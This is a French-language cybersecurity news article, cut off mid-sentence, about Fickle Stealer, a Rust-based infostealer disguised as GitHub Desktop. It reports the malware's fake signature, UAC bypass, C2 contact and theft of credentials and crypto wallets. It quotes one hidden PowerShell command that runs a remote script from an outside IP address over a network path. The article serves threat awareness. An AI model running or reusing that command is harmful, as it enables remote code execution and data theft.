Date : 11 novembre 2024

Fickle Stealer : Le Malware Basé sur Rust qui Se Déguise en GitHub Desktop

Encore un autre malware déguisé en application légitime ! Le Fickle Stealer, un malware basé sur Rust, fait son apparition dans le monde de la cybersécurité. D'après un rapport des chercheurs de Trellix, Mallikarjun Wali et Sangram Mohapatro, cette menace est bien plus sophistiquée qu'elle en a l'air. Elle vole des informations sensibles telles que des identifiants personnels, l'historique de navigation et même des informations sur les portefeuilles de cryptomonnaie.

Comment ça fonctionne ? Spoiler : Ce n'est pas GitHub Desktop

Fickle Stealer se présente comme une application légitime, notamment GitHub Desktop pour Windows, avec une signature numérique prétendant être de GitHub Inc. (signée par Microsoft Public RSA Time Stamping Authority). Mais attention, cette signature est factice, un détail utilisé pour tromper les victimes et éviter la détection.

Les étapes de l'attaque : Un vrai chef-d'œuvre de manipulation

Une fois exécuté, Fickle Stealer contourne le contrôle des comptes utilisateurs (UAC) via un script PowerShell et se connecte à un serveur de commande et contrôle (C2). Il utilise des techniques d'obfuscation et de anti-analyse pour échapper aux outils de détection traditionnels, siphonnant des données sensibles des systèmes infectés.

Le Script PowerShell et l'Ingénierie Sociale : Le Combo Parfait

Le malware active un script PowerShell (bypass.ps1 ou u.ps1), qui envoie des informations sensibles via un bot Telegram, telles que l'adresse IP, le pays et le système d'exploitation. Exemple de commande :

cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass -File \\\\185[.]213[.]208[.]245\\bypass\\u.ps1

Une Infection en Profondeur : Pas de Repos pour les Victimes

Le script engine.ps1 explore l'ordinateur infecté pour chercher des exécutables et y insérer son propre code. Les che